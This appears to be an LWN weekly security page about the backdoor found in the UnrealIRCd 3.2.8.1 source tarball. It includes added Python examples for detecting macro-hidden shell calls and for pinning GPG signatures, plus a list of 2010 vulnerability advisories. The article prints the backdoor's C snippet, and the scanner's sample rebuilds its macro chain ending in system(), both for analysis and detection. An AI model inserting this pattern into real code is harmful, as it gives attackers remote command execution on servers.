By Jake Edge
June 16, 2010
The discovery and announcement of a backdoor in UnrealIRCd is
embarrassing for the project, and it is certainly a real, live security
vulnerability. But it is hardly the "proof" that Linux is insecure, or less
secure than some other (proprietary) OS, that some pundits would have it be.
The problem is not Linux-specific, nor is it a problem with free software
development; it is something that could happen, and has happened, to any
software project.
UnrealIRCd is, as its name implies, an Internet Relay Chat (IRC) server.
It runs on most platforms and has added a number of features that some
folks find useful in an IRC server. It is not related to the Unreal
first-person shooter game, as some reported; it is simply a server that can
be run to host IRC channels for a wide variety of purposes.
From what the project can tell, around November 10, 2009 the copies of the
version 3.2.8.1 source tarball on the project's mirrors were replaced with a
version that contained a backdoor. That backdoor could be used by an
attacker to run any command on a system running a server built from the
compromised source. The command would, obviously, run with the privileges of
the user that executed the server. It took until June 12, 2010 for the swap
to be noticed, so anyone who picked up a copy of the source in that
seven-month window may be running a backdoored server.
The backdoor was disguised to look like a debug statement in the code:

    #ifdef DEBUGMODE3
    if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
        DEBUG3_LOG(readbuf);
    #endif

DEBUG3_LOG eventually resolves, through a chain of macros, to a call to
system(), while DEBUGMODE3_INFO is just the string "AB". The memcmp()
compares only the first two bytes of the read buffer, so any input whose
first two bytes are "AB" is handed, in its entirety, to system() and run by
the shell. Not a particularly sophisticated backdoor, but an effective one
nevertheless. As the advisory points out, even servers that are set up to
require passwords from users, or that do not allow any users at all, are
still vulnerable: the check is applied to whatever the server reads from a
connection, regardless of who sent it or whether they were allowed in.
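One check a practitioner would want after reading the above is a way to find a shell call hidden behind a macro chain without tracing every #define by hand. The following scanner is an added example, not code from UnrealIRCd, the advisory, or LWN. It follows #define chains in C source and flags any call site whose callee expands, through any number of macros, to system() or popen(). The embedded sample source is constructed to mirror the shape of the backdoor; the intermediate macro name DEBUG3_DOLOG and the function read_packet() are hypothetical.

```python
"""Scan C source for call sites that expand, via #define chains, to a shell call.

Added example: not UnrealIRCd's code. The sample source below is constructed;
DEBUG3_DOLOG and read_packet() are hypothetical names.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Functions that hand a string to /bin/sh; a macro reaching these is suspect.
SHELL_SINKS = {"system", "popen"}

# "#define NAME body" or "#define NAME(args) body"
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)(\([^)]*\))?\s*(.*)$")
# An identifier used as a call: NAME(
IDENT_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

SAMPLE_SOURCE = """\
/* Constructed sample mirroring the backdoor's shape; not UnrealIRCd code. */
#define DEBUG_LOG(x) fprintf(stderr, "%s\\n", (x))
#define DEBUGMODE3_INFO "AB"
#define DEBUG3_DOLOG(x) system(x)
#define DEBUG3_LOG(x) DEBUG3_DOLOG(x)

int read_packet(char *readbuf) {
    DEBUG_LOG(readbuf);
#ifdef DEBUGMODE3
    if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
        DEBUG3_LOG(readbuf);
#endif
    return 0;
}
"""


def collect_defines(source: str) -> Dict[str, str]:
    """Map macro name -> replacement text, joining backslash continuations."""
    defines: Dict[str, str] = {}
    for line in source.replace("\\\n", " ").splitlines():
        m = DEFINE_RE.match(line)
        if m:
            defines[m.group(1)] = m.group(3).strip()
    return defines


def resolves_to_shell(name: str, defines: Dict[str, str],
                      seen: Optional[Set[str]] = None) -> List[str]:
    """Return the expansion chain from `name` to a shell sink, or [] if none.

    Walks the identifiers called in each macro body depth-first, with a
    cycle guard so a self-referential macro cannot loop forever.
    """
    seen = set() if seen is None else seen
    if name in SHELL_SINKS:
        return [name]
    if name in seen or name not in defines:
        return []
    seen.add(name)
    for callee in IDENT_RE.findall(defines[name]):
        chain = resolves_to_shell(callee, defines, seen)
        if chain:
            return [name] + chain
    return []


def find_shell_reaching_calls(source: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, macro, chain) for every non-directive call site whose
    callee is a macro that expands to a shell sink. Direct system() calls are
    left to grep; the point here is the ones hidden behind a macro name."""
    defines = collect_defines(source)
    hits: List[Tuple[int, str, List[str]]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # preprocessor lines are definitions, not call sites
        for callee in IDENT_RE.findall(line):
            if callee in SHELL_SINKS:
                continue
            chain = resolves_to_shell(callee, defines)
            if chain:
                hits.append((lineno, callee, chain))
    return hits


if __name__ == "__main__":
    for lineno, macro, chain in find_shell_reaching_calls(SAMPLE_SOURCE):
        print(f"line {lineno}: {macro}(...) expands to {' -> '.join(chain)}")
```

Run against a real tree, the scanner should be pointed at the concatenation of each .c file with the headers it includes, since the macro chain usually lives in a header while the call site is in the .c file; on the sample it reports only the DEBUG3_LOG(readbuf) line and leaves the benign DEBUG_LOG() alone.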
The official Windows binaries were not affected by the backdoor, but there
is no reason that they couldn't have been. The underlying problem is that
the project provided no means for verifying the integrity of its downloads,
which allowed the switch to be made and to remain undetected for so long.
Since then, the project has started signing its code with GPG keys. A
signature only helps, of course, if the key it is checked against comes from
somewhere other than the same mirror that served the tarball, and if people
downloading the code actually verify it.
The affected code did make it into Gentoo, which issued an update on the
14th. But the fact that "Linux" was "backdoored" brought out the usual
suspects among web pundits eager to declare that it was a watershed moment
for Linux security. While it certainly was a black eye for UnrealIRCd, it
clearly wasn't one for Linux as a whole. First off, UnrealIRCd is
installed on very few Linux systems—it can hardly be considered a
core Linux program—and even those where it is installed
are likely to be running it as a separate user (e.g. ircd) with
fairly low privileges.
But even users with low privileges often have enough access to be useful to
attackers. One could imagine spammers and botnet herders finding ways to
use the network capabilities of a basic Linux user account, and the storage
on the system might be useful as well. Unless the server is being run as
root, no direct compromise of the whole system should be possible, though it
is important to note that a local privilege escalation, in the kernel or
elsewhere, could be used to take the system over from that foothold.
One of the more laughable claims about the flaw was Ed Bott's declaration
that Windows virus scanners would have detected the problem had it impacted
those binaries. Bott must be under the impression that virus scanners
somehow magically recognize backdoors in executable code. The truth, of
course, is much more prosaic: some human finds the malware and updates the
signatures that the virus scanners use. Unless this exact backdoor had
already been found in other Windows binaries, and a signature created for
it, no virus scanner would pick it up.
There are certainly lessons to be learned here (integrity checking is
important, for one), but not the ones that many of the Windows-centric
columnists are pushing. Windows is no more (or less) vulnerable than Linux
to these kinds of attacks; when attackers control the code that you run, it
is "game over" no matter what OS you run. It is possible that SELinux,
TOMOYO, or AppArmor could mitigate this kind of attack to some extent, by
confining what the ircd process is allowed to execute, but it is somewhat
unlikely that anyone has (yet) tackled configuring any of those for a fairly
obscure IRC server.
It is another reminder that we need to be more vigilant about protecting
our code distribution networks. It may be somewhat less common these days,
as many folks get their new software from distribution repositories, but
grabbing a tarball, untarring it, and typing:

    ./configure; make; make install

is a longstanding tradition in the open source world. In order to continue
that tradition safely, it would be very helpful to automatically check
signatures when downloading, but the mechanism for doing so is, as yet,
unclear. For now, checking signatures manually, against a key obtained
through some channel other than the download mirror, and being very leery
of unsigned code, is the prudent course.
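What "checking signatures manually" needs to include is easy to get wrong: a zero exit status from gpg --verify only says that some key in your keyring made a valid signature, not that it was the project's key. The following is an added example, not code from UnrealIRCd or from LWN, of verifying a detached signature while pinning the expected signer's fingerprint by parsing gpg's --status-fd output. The fingerprint, key ID, user ID and status lines embedded below are constructed placeholders in the format gpg documents, not real keys or signatures; the file paths are assumptions.

```python
"""Verify a downloaded tarball against a detached GPG signature, pinning the
signer's fingerprint rather than trusting gpg's exit status alone.

Added example, not UnrealIRCd's or LWN's code. PINNED_FPR and the status
lines in SAMPLE_STATUS_* are constructed placeholders.
"""
import hashlib
import subprocess
from typing import Optional

# Placeholder for the project's release-signing fingerprint, which must come
# from somewhere other than the download mirror (keyserver, signed mail, a
# key already on disk from an earlier release).
PINNED_FPR = "0123456789ABCDEF0123456789ABCDEF01234567"

# Any of these means a signature was examined and must not be treated as good.
REJECT = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG"}


def parse_gpg_status(status_text: str, expected_fpr: str) -> bool:
    """Return True only if gpg reported exactly one signature, it was GOODSIG,
    and its VALIDSIG line names the pinned fingerprint (either the signing
    key or, in the last field, that key's primary key)."""
    expected = expected_fpr.replace(" ", "").upper()
    sigs = 0
    good = False
    pinned = False
    for line in status_text.splitlines():
        if not line.startswith("[GNUPG:] "):
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        keyword = fields[1]
        if keyword in REJECT:
            return False  # a bad, expired or revoked signature anywhere fails
        if keyword == "GOODSIG":
            sigs += 1
            good = True
        elif keyword == "VALIDSIG" and len(fields) >= 3:
            # fields[2]: fingerprint that made the signature;
            # fields[-1]: primary-key fingerprint when gpg appends it.
            if expected in {fields[2].upper(), fields[-1].upper()}:
                pinned = True
    return sigs == 1 and good and pinned


def verify_download(tarball: str, signature: str, expected_fpr: str,
                    keyring: Optional[str] = None) -> bool:
    """Run gpg on a detached signature and apply parse_gpg_status.

    `keyring` should name a file holding only the project's key, so that a
    key planted next to a tampered tarball cannot satisfy the check.
    """
    cmd = ["gpg", "--batch", "--status-fd", "1", "--verify"]
    if keyring:
        cmd += ["--no-default-keyring", "--keyring", keyring]
    cmd += [signature, tarball]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return parse_gpg_status(proc.stdout, expected_fpr)


def sha256_file(path: str) -> str:
    """Hex SHA-256 of a file, for comparison with a checksum obtained through
    a channel independent of the mirror (a checksum file on the same mirror
    would simply have been replaced along with the tarball)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


# Constructed status output in the shape gpg emits; no real signatures.
SAMPLE_STATUS_GOOD = (
    "[GNUPG:] NEWSIG\n"
    "[GNUPG:] GOODSIG 89ABCDEF01234567 Example Project <release@example.org>\n"
    "[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2010-06-14 "
    "1276500000 0 4 0 1 2 00 0123456789ABCDEF0123456789ABCDEF01234567\n"
    "[GNUPG:] TRUST_UNDEFINED 0 pgp\n"
)
SAMPLE_STATUS_WRONG_KEY = SAMPLE_STATUS_GOOD.replace(
    "0123456789ABCDEF0123456789ABCDEF01234567",
    "FEDCBA9876543210FEDCBA9876543210FEDCBA98")
SAMPLE_STATUS_BAD = (
    "[GNUPG:] NEWSIG\n"
    "[GNUPG:] BADSIG 89ABCDEF01234567 Example Project <release@example.org>\n"
)
SAMPLE_STATUS_EXPIRED = SAMPLE_STATUS_GOOD.replace("GOODSIG", "EXPKEYSIG")

if __name__ == "__main__":
    # Usage against real files (paths are assumptions):
    # ok = verify_download("Unreal3.2.8.1.tar.gz", "Unreal3.2.8.1.tar.gz.asc",
    #                      PINNED_FPR, keyring="unrealircd-release.gpg")
    print(parse_gpg_status(SAMPLE_STATUS_GOOD, PINNED_FPR))
```

The design point is that GOODSIG alone is not sufficient (it tells you nothing about which key signed), and VALIDSIG alone is not sufficient either (gpg emits it for expired and revoked keys too, alongside EXPKEYSIG or REVKEYSIG), so the check requires both, rejects any failure keyword, and insists on a single signature so a .asc containing one good and one bad signature does not pass.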
Brief items
Fundamentally a password is something that can have its value rapidly drop
to zero without warning. It doesn't wear out.
-- Russell Coker on password expiration
ENF [Electrical Network Frequency analysis] relies on frequency variations
in the electricity supplied by the National Grid. Digital devices such as
CCTV recorders, telephone recorders and camcorders that are plugged in to
or located near the mains pick up these deviations in the power supply,
which are caused by peaks and troughs in demand. Battery-powered devices
are not immune to ENF analysis, as grid frequency variations can be
induced in their recordings from a distance.
-- The Register reports on a new forensic technique
PCWorld looks at a backdoor in Unreal IRC, an Internet relay chat platform
for Linux. "An announcement on the Unreal IRCd Forums states 'This is very
embarrassing...We found out that the Unreal3.2.8.1.tar.gz file on our
mirrors has been replaced quite a while ago with a version with a backdoor
(trojan) in it. This backdoor allows a person to execute ANY command with
the privileges of the user running the ircd. The backdoor can be executed
regardless of any user restrictions (so even if you have passworded server
or hub that doesn't allow any users in).'"
New vulnerabilities
cacti: SQL injection
Package(s): cacti
CVE #(s): CVE-2010-2092
Created: June 14, 2010; Updated: June 17, 2010
Description (from the Debian advisory):
Stefan Esser discovered that cacti, a front-end to rrdtool for monitoring
systems and services, is not properly validating input passed to the rra_id
parameter of the graph.php script. Due to checking the input of $_REQUEST
but using $_GET input in a query, an unauthenticated attacker is able to
perform SQL injections via a crafted rra_id $_GET value and an additional
valid rra_id $_POST or $_COOKIE value.
dhcp: denial of service
Package(s): dhcp
CVE #(s): CVE-2010-2156
Created: June 11, 2010; Updated: June 30, 2010
Description (from the Mandriva advisory):
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote
attackers to cause a denial of service (server exit) via a zero-length
client ID.
emesene: symlink attack
Package(s): emesene
CVE #(s): CVE-2010-2053
Created: June 11, 2010; Updated: June 16, 2010
Description (from the CVE entry):
emesenelib/ProfileManager.py in emesene before 1.6.2 allows local users to
overwrite arbitrary files via a symlink attack on the emsnpic temporary
file.
flash-player: multiple vulnerabilities
glibc: denial of service
Package(s): glibc
CVE #(s): CVE-2009-4880, CVE-2009-4881
Created: June 10, 2010; Updated: November 23, 2010
Description (from the Debian advisory):
Maksymilian Arciemowicz discovered that the GNU C library did not
correctly handle integer overflows in the strfmon family of
functions. If a user or automated system were tricked into
processing a specially crafted format string, a remote attacker
could crash applications, leading to a denial of service.
moin: cross-site scripting
Package(s): moin
CVE #(s): (none listed)
Created: June 14, 2010; Updated: June 29, 2010
Description (from the Red Hat bugzilla):
A possible reflected cross-site scripting attack was discovered in Moin.
An attacker able to cause a user to follow a specially crafted malicious link
may be able to recover session identifiers or exploit browser vulnerabilities,
due to a vulnerable template parameter. The upstream bug report links to
patches to correct the flaw.
mono: cross-site scripting
Package(s): mono
CVE #(s): CVE-2010-1459
Created: June 15, 2010; Updated: July 26, 2012
Description (from the Pardus advisory):
The default configuration of ASP.NET in Mono before 2.6.4 has a value of
FALSE for the EnableViewStateMac property, which allows remote attackers
to conduct cross-site scripting (XSS) attacks, as demonstrated by the
__VIEWSTATE parameter to 2.0/menu/menu1.aspx in the XSP sample project.
openssl: arbitrary code execution
Package(s): openssl
CVE #(s): CVE-2010-0742
Created: June 15, 2010; Updated: June 22, 2010
Description (from the Pardus advisory):
The Cryptographic Message Syntax (CMS) implementation in
crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a
does not properly handle structures that contain OriginatorInfo, which
allows context-dependent attackers to modify invalid memory locations or
conduct double-free attacks, and possibly execute arbitrary code, via
unspecified vectors.
openssl: information leak
Package(s): openssl
CVE #(s): CVE-2010-1633
Created: June 15, 2010; Updated: June 16, 2010
Description (from the CVE entry):
RSA verification recovery in the EVP_PKEY_verify_recover function in
OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other
applications, returns uninitialized memory upon failure, which might allow
context-dependent attackers to bypass intended key requirements or obtain
sensitive information via unspecified vectors. NOTE: some of these details
are obtained from third party information.
pcsc-lite: privilege escalation
Package(s): pcsc-lite
CVE #(s): CVE-2010-0407
Created: June 11, 2010; Updated: September 24, 2010
Description (from the Debian advisory):
It was discovered that PCSCD, a daemon to access smart cards, was vulnerable
to a buffer overflow allowing a local attacker to elevate his privileges
to root.
python: multiple vulnerabilities
Package(s): python
CVE #(s): CVE-2010-1634, CVE-2010-2089, CVE-2008-5983
Created: June 14, 2010; Updated: October 25, 2012
Description (from the CVE entries):
Multiple integer overflows in audioop.c in the audioop module in Python
2.6, 2.7, 3.1, and 3.2 allow context-dependent attackers to cause a denial
of service (application crash) via a large fragment, as demonstrated by a
call to audioop.lin2lin with a long string in the first argument, leading
to a buffer overflow. NOTE: this vulnerability exists because of an
incorrect fix for CVE-2008-3143.5. (CVE-2010-1634)

The audioop module in Python 2.7 and 3.2 does not verify the relationships
between size arguments and byte string lengths, which allows
context-dependent attackers to cause a denial of service (memory corruption
and application crash) via crafted arguments, as demonstrated by a call to
audioop.reverse with a one-byte string, a different vulnerability than
CVE-2010-1634. (CVE-2010-2089)

Untrusted search path vulnerability in the PySys_SetArgv API function in
Python 2.6 and earlier, and possibly later versions, prepends an empty
string to sys.path when the argv[0] argument does not contain a path
separator, which might allow local users to execute arbitrary code via a
Trojan horse Python file in the current working directory. (CVE-2008-5983)
samba: denial of service
Package(s): samba
CVE #(s): (none listed)
Created: June 15, 2010; Updated: June 16, 2010
Description (from the Pardus advisory):
The Server Message Block (SMB) protocol, also known as Common Internet
File System (CIFS), acts as an application-layer protocol to provide
shared access to files, printers and Inter-Process Communication (IPC).
It is also a transport for Distributed Computing Environment / Remote
Procedure Call (DCE / RPC) operations. After negotiating an SMB
communication the client sends a 'Session Setup AndX' packet to
negotiate a session in order to be able to connect on a specific share.
It is possible to trigger an uninitialized variable read by sending a
specific 'Session Setup AndX' query. Successful exploitation of the
issue will result in a denial of service.
samba: arbitrary code execution
Package(s): samba
CVE #(s): CVE-2010-2063
Created: June 16, 2010; Updated: October 18, 2010
Description (from the Ubuntu advisory):
Jun Mao discovered that Samba did not correctly validate SMB1 packet
contents. An unauthenticated remote attacker could send specially crafted
network traffic that could execute arbitrary code as the root user.
sudo: privilege escalation
Package(s): sudo
CVE #(s): CVE-2010-1646
Created: June 15, 2010; Updated: January 25, 2011
Description (from the Pardus advisory):
The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and
1.7.0 through 1.7.2p6 does not properly handle an environment that
contains multiple PATH variables, which might allow local users to gain
privileges via a crafted value of the last PATH variable.
tiff: arbitrary code execution
Package(s): tiff
CVE #(s): (none listed)
Created: June 15, 2010; Updated: June 16, 2010
Description (from the Pardus advisory):
Multiple integer overflows in the handling of TIFF files may result in a
heap buffer overflow. Opening a maliciously crafted TIFF file may lead
to an unexpected application termination or arbitrary code execution.
These issues are addressed through improved bounds checking. Credit to
Kevin Finisterre of digitalmunition.com for reporting this issue.
unrealircd: multiple vulnerabilities
Package(s): unrealircd
CVE #(s): (none listed)
Created: June 15, 2010; Updated: June 16, 2010
Description (from the Gentoo advisory):
Multiple vulnerabilities have been reported in UnrealIRCd:
* The vendor reported a buffer overflow in the user authorization
  code.
* The vendor reported that the distributed source code of UnrealIRCd
  was compromised and altered to include a system() call that could be
  called with arbitrary user input.
A remote attacker could exploit these vulnerabilities to cause the
execution of arbitrary commands with the privileges of the user running
UnrealIRCd, or a Denial of Service condition.
wireshark: multiple vulnerabilities
Package(s): wireshark
CVE #(s): (none listed)
Created: June 10, 2010; Updated: June 16, 2010
Description (from the wireshark advisory):
* The SMB dissector could dereference a NULL pointer. (Bug 4734)
  Versions affected: 0.99.6 to 1.0.13, 1.2.0 to 1.2.8
* J. Oquendo discovered that the ASN.1 BER dissector could overrun the
  stack.
  Versions affected: 0.10.13 to 1.0.13, 1.2.0 to 1.2.8
* The SMB PIPE dissector could dereference a NULL pointer on some
  platforms.
  Versions affected: 0.8.20 to 1.0.13, 1.2.0 to 1.2.8
* The SigComp Universal Decompressor Virtual Machine could go into an
  infinite loop. (Bug 4826)
  Versions affected: 0.10.7 to 1.0.13, 1.2.0 to 1.2.8
* The SigComp Universal Decompressor Virtual Machine could overrun a
  buffer. (Bug 4837)
  Versions affected: 0.10.8 to 1.0.13, 1.2.0 to 1.2.8
Page editor: Jake Edge